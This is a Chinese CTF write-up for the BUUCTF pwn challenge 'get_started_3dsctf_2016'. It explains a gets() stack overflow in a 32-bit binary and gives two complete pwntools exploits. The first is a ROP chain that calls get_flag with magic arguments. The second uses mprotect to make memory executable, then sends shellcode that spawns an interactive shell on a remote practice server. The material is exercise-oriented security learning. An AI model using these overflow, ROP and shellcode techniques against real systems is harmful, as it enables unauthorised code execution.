当前位置:网站首页>get_started_3dsctf_2016
get_started_3dsctf_2016
2022-06-24 06:43:00 【[mzq]】
get_started_3dsctf_2016
checksec 程序是32位的,开了一些问题不大的保护,ida看一下
main函数
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [esp+4h] [ebp-38h]
printf("Qual a palavrinha magica? ", v4);
gets(&v4); #gets函数可以无限溢出
return 0;
}
get_flag函数
我们构造a1 == 0x308CD64F && a2 == 0x195719D1 ,然后get_flag函数的返回地址填入exit函数,就可以把flag给带出来
void __cdecl get_flag(int a1, int a2)
{
int v2; // eax
int v3; // esi
unsigned __int8 v4; // al
int v5; // ecx
unsigned __int8 v6; // al
if ( a1 == 0x308CD64F && a2 == 0x195719D1 ) # 判断a1 和 a2如果等于给定的数就读取flag
{
v2 = fopen("flag.txt", "rt");
v3 = v2;
v4 = getc(v2);
if ( v4 != 255 )
{
v5 = (char)v4;
do
{
putchar(v5);
v6 = getc(v3);
v5 = (char)v6;
}
while ( v6 != 255 );
}
fclose(v3);
}
}
exp1
from pwn import *
io = process("./get_started_3dsctf_2016")
io = remote("node4.buuoj.cn",26448)
elf = ELF("./get_started_3dsctf_2016")
context(log_level="debug",arch="i386")
get_flag_addr = elf.symbols["get_flag"]
exit_addr = elf.symbols["exit"]
ret_addr = 0x08048196
a1 = 0x308CD64F
a2 = 0x195719D1
print hex(get_flag_addr),hex(exit_addr)
payload = flat(["a"*56,ret_addr,get_flag_addr,exit_addr,a1,a2])
io.sendline(payload)
io.recv()
mprotect函数
参考 https://blog.csdn.net/qq_32095699/article/details/114225953
简单的来说这个函数可以给地址赋予权限,也是Linux下的系统函数,他的三个参数
第一个参数填的是一个地址,是指需要进行操作的地址。
第二个参数是地址往后多大的长度。
第三个参数的是要赋予的权限。
这三个参数是存在 ebx esi ebp 中
int __cdecl mprotect(int a1, int a2, int a3)
{
int result; // eax
result = dl_sysinfo(a2, a3);
JUMPOUT(result, -4095, _syscall_error);
return result;
}
可参考 https://www.wenjiangs.com/doc/dtkwp70q9e#ef45581adcf1589aa9c8efb9d4c10ec4
exp2
第二种方法其实就是利用了mprotect函数给地址可读可写的权限,然后往地址些shellcode然后调用执行,其实也没多复杂
from pwn import *
io = process("./get_started_3dsctf_2016")
io = remote("node4.buuoj.cn",26448)
elf = ELF("./get_started_3dsctf_2016")
context(log_level="debug",arch="i386")
mprotect_addr = elf.symbols["mprotect"]
read_plt = elf.symbols["read"]
pop_ebx_esi_ebp_ret = 0x0804f460
buf = 0x8048000
print mprotect_addr
payload = flat(["a"*0x38,mprotect_addr,pop_ebx_esi_ebp_ret,buf,0x1000,0x7,read_plt,buf,0,buf,0x200])
io.sendline(payload)
shellcode = asm(shellcraft.sh(),arch='i386')
io.sendline(shellcode)
io.interactive()
边栏推荐
- [Yugong series] June 2022 asp Basic introduction and use of cellreport reporting tool under net core
- Vmware tools still exist after normal uninstallation for many times. How to solve it
- 華為雲數據庫進階學習
- Stop looking! The most complete data analysis strategy of the whole network is here
- Software performance test analysis and tuning practice path - JMeter's performance pressure test analysis and tuning of RPC Services - manuscript excerpts
- What is JSP technology? Advantages of JSP technology
- 大厂不是衡量能力的唯一出路,上财学姐毕业三年的经验分享
- 【Proteus】Arduino UNO + DS1307+LCD1602时间显示
- JVM调试工具-jvisualvm
- Spark project Packaging Optimization Practice
猜你喜欢
buuctf misc 从娃娃抓起
大厂不是衡量能力的唯一出路,上财学姐毕业三年的经验分享
MFC使用控制台时 项目路径中不能有空格和中文,否则会报错误 LNK1342 未能保存要编辑的二进制文件的备份副本等
. Net7 miniapi (special part):preview5 optimizes JWT verification (Part 1)
Win11笔记本省电模式怎么开启?Win11电脑节电模式打开方法
華為雲數據庫進階學習
软件性能测试分析与调优实践之路-JMeter对RPC服务的性能压测分析与调优-手稿节选
华为云图引擎服务
Unexpected token u in JSON at position 0
JVM調試工具-Arthas
随机推荐
JVM调试工具-jvisualvm
MAUI使用Masa blazor组件库
Cisco router configuration notes: static routing, rip, OSPF, principles combined with experiments, worth a visit!
In JS, the regular expression verifies the hour and minute, and converts the input string to the corresponding hour and minute
Stop looking! The most complete data analysis strategy of the whole network is here
【信号识别】基于深度学习CNN实现信号调制分类附matlab代码
Learning to use BACnet gateway of building control system is not so difficult
[WUSTCTF2020]爬
Hyperledger fabric ledger snapshot - fast data synchronization
简单使用Modbus转BACnet网关教程
Spark project Packaging Optimization Practice
JVM debugging tool -jps
Spark项目打包优化实践
华为云数据库进阶学习
现货黄金有哪些值得借鉴的心态
The latest crawler tutorial in 2021: video demonstration of web crawling
JVM调试工具-jmap
Unexpected token u in JSON at position 0
【WordPress建站】6. 文章内容防复制
【Cnpm】使用教程